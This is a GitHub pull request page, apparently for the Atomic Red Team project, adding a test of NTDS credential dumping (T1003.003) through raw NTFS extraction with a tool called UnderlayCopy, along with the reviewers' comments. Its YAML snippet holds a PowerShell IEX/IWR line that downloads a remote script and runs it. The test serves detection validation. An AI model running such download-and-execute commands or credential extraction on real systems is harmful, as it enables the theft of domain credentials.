-
Notifications
You must be signed in to change notification settings - Fork 3k
Update T1003.003.md & T1003.003.yaml via UnderlayCopy #3217
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
base: master
Are you sure you want to change the base?
Conversation
|
Thank you for this PR @kfallahi- Can you please add screenshots of the execution and cleanup of this atomic via Invoke ? hat will be of huge help for review Also no need to add the .md files next time , these are automatically generated from the yaml files |
atomics/T1003.003/T1003.003.yaml
Outdated
| executor: | ||
| command: | | ||
| [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 | ||
| IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hey @kfallahi Thanks for your contribution. Instead of refs/heads/main can you tag it to a particular commit ID like
https://github.com/kfallahi/UnderlayCopy/blob/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1 ?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
If you could also move this URL to an input argument, it would be great :)
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks! I’ve updated it to reference a specific commit ID and moved the URL to an input argument. Please let me know if anything else is needed.
This PR adds an atomic test that demonstrates NTDS Dumping via raw NTFS extraction using UnderlayCopy.
UnderlayCopy extracts protected/locked system artifacts (SAM, SYSTEM, NTDS) by parsing $MFT and/or mapping clusters via filesystem metadata. This atomic helps validate detections for raw-volume and MFT-based acquisition techniques.
Atomic: Copy NTDS in low level NTFS acquisition (MFT and fsutil method)
ATT&CK mapping: T1003.003
Executor: powershell
References: https://github.com/kfallahi/UnderlayCopy
I can add additional atomics for SAM and SYSTEM (mapped to T1003.002) if maintainers prefer.